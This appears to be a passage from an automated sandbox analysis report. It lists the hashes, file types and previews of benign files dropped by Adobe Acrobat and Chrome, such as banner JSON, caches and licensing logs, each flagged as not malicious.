                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):1090
                                                                                    Entropy (8bit):5.665079450406212
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Yv6XBcDzvlamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSI:YvEcPhBgkDMUJUAh8cvMI
                                                                                    MD5:E59E41477CDB85F418C63A43F79A8E15
                                                                                    SHA1:D650005DA5819126A28FB5E4BBD50A41A05430ED
                                                                                    SHA-256:DB7D3678D79C3E13A7986AA73F49D6B2AF3A604A45DF617BC219E6E97A095386
                                                                                    SHA-512:7EE055DA1E83896177A53CDC9C176A3F9F075FA75D7F1B5DDD27C413195BD4456D4F06E46C7C54B4B7439F53FEC04612E7AD230F681154047BDD675BBD84E046
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):286
                                                                                    Entropy (8bit):5.2587818514395614
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJfshHHrPeUkwRe9:YvXKXBcDZc0vAGUUUkee9
                                                                                    MD5:CD268DF46418525B6D7DA04E6F1CBCE9
                                                                                    SHA1:7C71C9D941CAB10533AB097BEC780C30FD80D2E7
                                                                                    SHA-256:471396C69CFFEB6EF7AF2E2A6D682418F323731277000395BCD998AB339CE48E
                                                                                    SHA-512:5DCD7749E0C253C8380AAD29070FCF7AE468ABD18A87F9CB0E3B1CD041FE42F6BDB9338CB355723204255B59BB55011A595C65B8CDEC5E0004B8DA449BCF36EB
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):282
                                                                                    Entropy (8bit):5.268461366424381
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXBcXCVoZcg1vRcR0YeLoAvJTqgFCrPeUkwRe9:YvXKXBcDZc0vAGTq16Ukee9
                                                                                    MD5:4928309DFF1D7B3E1EC640CB11F409C5
                                                                                    SHA1:6704855E8A273CE91108943A741F0E7C25066156
                                                                                    SHA-256:0E4A25CADBBBA20439371524BA127269BCF338BE3D94F3B1BDFE5FADCD97E3FE
                                                                                    SHA-512:7A5FA7B319C6B4BD2090C9CBB6C9222187B4FE76F4E66FCC57D9DA335FB6CC9C90C11718DDED03AAA0B74F571C1B6C85036F37F901D3FA2E7B5676BA63B01D4C
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"692652fb-2dd9-427d-a8da-a58808073ade","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734653457297,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):0.8112781244591328
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:e:e
                                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                    Malicious:false
                                                                                    Preview:....
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):2814
                                                                                    Entropy (8bit):5.137686160893308
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:YZkJta4hayWkFrPcoxcqjNj0SlMPh2sK2LS/CdPUOoK+OO5Arh9RQGJRu5OG:Y2q8rPcShOOdquK+HGrh9RQY8
                                                                                    MD5:157C0647CBC3081BDF12700AEEAE34CA
                                                                                    SHA1:28BF78139CFD2621B41D6C46CD471C0FBE57A613
                                                                                    SHA-256:88B5BD487D9205AC1CCFC4CC2B675A43C121EC80B8DDFE1093330D696E0ABBC0
                                                                                    SHA-512:BD0807C504F9B1897EB8595416F08055670147BED0DA9F9D64037BCDA8CFF3BCDA4FD3FC2DE3EED7A9CCF9A11158379935DDC1D3B14BE874E7D2DFAB97D02848
                                                                                    Malicious:false
                                                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"53930e602ffa250394d46d7663536b28","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734478121000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"a2f164d821a054027bef0aae5a9742ce","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734478121000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"542821bbffd26db335e3d147f9d40687","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734478121000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"5c362661a31b1a6cabad606494e7404a","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734478121000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"cd4dae88b010e72ad9512bda5be82329","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734478121000},{"id":"DC_Reader_RHP_Intent_Banner","info":{"dg":"2ad09580d17863796a2689fc9912f949","sid":"DC_Reader_RHP_Intent_Banner"},"mimeType":"fil
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                    Category:dropped
                                                                                    Size (bytes):12288
                                                                                    Entropy (8bit):1.1866613719230108
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:TGufl2GL7msEHUUUUUUUUWSvR9H9vxFGiDIAEkGVvpJ:lNVmswUUUUUUUUW+FGSIt1
                                                                                    MD5:B10EDB06A2DE6ECEB2A1A4CEE82E9581
                                                                                    SHA1:E8F3773FFCD422E452D8B3D13A9AA69840F5F1E6
                                                                                    SHA-256:D07E09333A703402745B61492A3C14252CAF328FEA30DA1FE559EBC27ABD6231
                                                                                    SHA-512:8CE3EF5133378E3DF74EB5216D0E69575F1E0C1C64C80A3BB2837C6CD39A755E04DB5795A11F6F5C1CEA58B9038CD354ACC1C830BA28D845CC7C7326985D8EC0
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:SQLite Rollback Journal
                                                                                    Category:dropped
                                                                                    Size (bytes):8720
                                                                                    Entropy (8bit):1.6035016439456953
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:7MkKUUUUUUUUUU0vR9H9vxFGiDIAEkGVvdqFl2GL7ms6N:7QUUUUUUUUUUkFGSItrKVmsy
                                                                                    MD5:D21A7D349C7C65F2AECFC60F134D557A
                                                                                    SHA1:D9C9CA46E7766EB9FFE9ADA50A1CA56201BE545F
                                                                                    SHA-256:F5ADBEC2D6EE3438B2D5398C855D3C1447AF9B8569D34116D6991FC8D8FC5D3C
                                                                                    SHA-512:05F16CFE65798322CB76069EEC333EC7929FEE89400853BC8240ECC214F0DFBCCBAFF6C0F765C2C3308F71D542CFBA97497B6962D743C775BB6E5F2CCB08686D
                                                                                    Malicious:false
                                                                                    Preview:.... .c.....A.#.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):66726
                                                                                    Entropy (8bit):5.392739213842091
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEgXYjUaKQub+vqDgk7EjqaIs4NYyu:6a6TZ44ADEjPb+vqDgkUI3NK
                                                                                    MD5:609C2A83FB728DFB3E354A155807BD55
                                                                                    SHA1:01125E56802349408FB27CCC68BA608A0B136154
                                                                                    SHA-256:17934497A08CE70D51A6FD6F69DB30E6ABA24896FBB37F35116FB67F7E42543B
                                                                                    SHA-512:EA5B03E71B977B6733698329154FC5CDD6B89D8000893A458BB09D0E59CC391B2B3C3623F1C574A6E0C3C295447FB6BE38D4BD5F82961EF1BDA7DF74798B1596
                                                                                    Malicious:false
                                                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):246
                                                                                    Entropy (8bit):3.5097251598291805
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8AaFslnf9:Qw946cPbiOxDlbYnuRK9ll
                                                                                    MD5:AD87D0C1B4EC902A1BD056C9DBAA9ACC
                                                                                    SHA1:3D85EAE5AAD0BDD2D43C836363D7049906EB0D61
                                                                                    SHA-256:B54C51206F60CD33715FAECBD7C0666D653CD1BB50806946B2E3EDB21B18FB11
                                                                                    SHA-512:BBA7835DB800879B269778B2BFB5D3A8BDDC9F43DD085057B16D2D7C84CBAED84537AD0BBDD3B11FBFBA1E8165BE17930E7AD219FDD12C0682ACA84315F323E9
                                                                                    Malicious:false
                                                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.7./.1.2./.2.0.2.4. . .1.8.:.2.8.:.3.8. .=.=.=.....
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:ASCII text, with very long lines (393)
                                                                                    Category:dropped
                                                                                    Size (bytes):16525
                                                                                    Entropy (8bit):5.345946398610936
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                    MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                    SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                    SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                    SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                    Malicious:false
                                                                                    Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):15114
                                                                                    Entropy (8bit):5.3581299705452246
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:dGyzCy/IJrUc1IZSxOFoGhsVlO9gg0ITwb+syusFCXzQnxaRpiPGzRSP6oycyV9s:kby
                                                                                    MD5:2981E33D929259DDF81C398B6B79EFF0
                                                                                    SHA1:F1D7BA2B3D49D9C38C834E550102346CC06078E9
                                                                                    SHA-256:B2C737743A7182707ACCA3C63F2AF22CA5F456AF95C72D12B314284D8D5A2EF1
                                                                                    SHA-512:9A182C8A45C9CFE88BB7003D9E0BD8B7DFDCC5ED5F5820764F352725F63DFF5B67AB6B80F677FB2F914A9BEA1D28350F6830542A23AAA87C9F6F80E2D5814FBA
                                                                                    Malicious:false
                                                                                    Preview:SessionID=c35d7d41-879c-44ef-a3f7-a0ec9929bc6a.1734478112872 Timestamp=2024-12-17T18:28:32:872-0500 ThreadID=2144 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=c35d7d41-879c-44ef-a3f7-a0ec9929bc6a.1734478112872 Timestamp=2024-12-17T18:28:32:873-0500 ThreadID=2144 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=c35d7d41-879c-44ef-a3f7-a0ec9929bc6a.1734478112872 Timestamp=2024-12-17T18:28:32:873-0500 ThreadID=2144 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=c35d7d41-879c-44ef-a3f7-a0ec9929bc6a.1734478112872 Timestamp=2024-12-17T18:28:32:873-0500 ThreadID=2144 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=c35d7d41-879c-44ef-a3f7-a0ec9929bc6a.1734478112872 Timestamp=2024-12-17T18:28:32:873-0500 ThreadID=2144 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):29752
                                                                                    Entropy (8bit):5.398021165375742
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rr:3
                                                                                    MD5:7858821CF5E7C1AF7EFC500B23B25C18
                                                                                    SHA1:D0D38C88388859D9515C8621D68534EA142C2BD8
                                                                                    SHA-256:C4B23266513D48FFC54CE7DAE27ECC5E970831223C42D5838C50A70F43478D0C
                                                                                    SHA-512:2FC32278702D7E9EA753D2DCF0A3441FA12310BA7A98490F141539DA7992506CFD48402808D51CAEEA5DFE998DD557DA999D8C3DA1A57B1C4D1EE832EE78D47E
                                                                                    Malicious:false
                                                                                    Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                    Category:dropped
                                                                                    Size (bytes):386528
                                                                                    Entropy (8bit):7.9736851559892425
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                    Malicious:false
                                                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                    Category:dropped
                                                                                    Size (bytes):758601
                                                                                    Entropy (8bit):7.98639316555857
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                    MD5:3A49135134665364308390AC398006F1
                                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                    Malicious:false
                                                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                                                                                    Category:dropped
                                                                                    Size (bytes):1407294
                                                                                    Entropy (8bit):7.97605879016224
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:1ywYIGNPHgdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZRs:owZGO3mlind9i4ufFXpAXkrfUs0qWLxR
                                                                                    MD5:52D412286FB5F88AE333D8AF2A3CAFDC
                                                                                    SHA1:2920B2A63F47E92FF97BA8A9DD150B423DA9BA7B
                                                                                    SHA-256:1E2E3A1D03185B712E6C3354B9C5D58F4A8DB397D0D224668684D9C70C256158
                                                                                    SHA-512:77D6E2E72F47A6D79911E5185ED53D9734BF954317C83A1D66BA321568EB697F0435504C962D570AAF8D53739C98B1C44EBD0B6018966B5A3A2041A00452A5E9
                                                                                    Malicious:false
                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                    Category:dropped
                                                                                    Size (bytes):1419751
                                                                                    Entropy (8bit):7.976496077007677
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:6DaWL07oXGZGwYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:caWLxXGZGwZGh3mlind9i4ufFXpAXkru
                                                                                    MD5:7867DAFF192926A49EB7516D226D452F
                                                                                    SHA1:BD0B185B12DB865CEA23060A9789C6B2D814B62E
                                                                                    SHA-256:C7586BA81615BBAA63DA0D81CE18C0D087D1237500C99C35239A4D3CAEED2934
                                                                                    SHA-512:B556042E82056983EA6A69AEE0DAB370641437EF6239FD04676FC26EC9472C6E5EF6194885C165E3987E8019321DCD9B4A574EA7A6253AC3C9468434AEAA0C21
                                                                                    Malicious:false
                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:HTML document, ASCII text, with very long lines (2789)
                                                                                    Category:downloaded
                                                                                    Size (bytes):3146
                                                                                    Entropy (8bit):5.338524213273031
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:8VfUYmgUPV5DUBeF5StYfPiLWfwicwg1iS4N+Hc+IQ01dSxeVnT:8pwgDeF5SqfPiLYwbLDHcRb1IeJ
                                                                                    MD5:ECD20EB06A6EC3A48FA5A698C24ABA86
                                                                                    SHA1:3A78F36DCB602AB0727695250EDFD28D81011C39
                                                                                    SHA-256:E4CD6B39FE04BABC0E3430B76CE4CC4D8C9F95781D49E3A09148E5C746014BD1
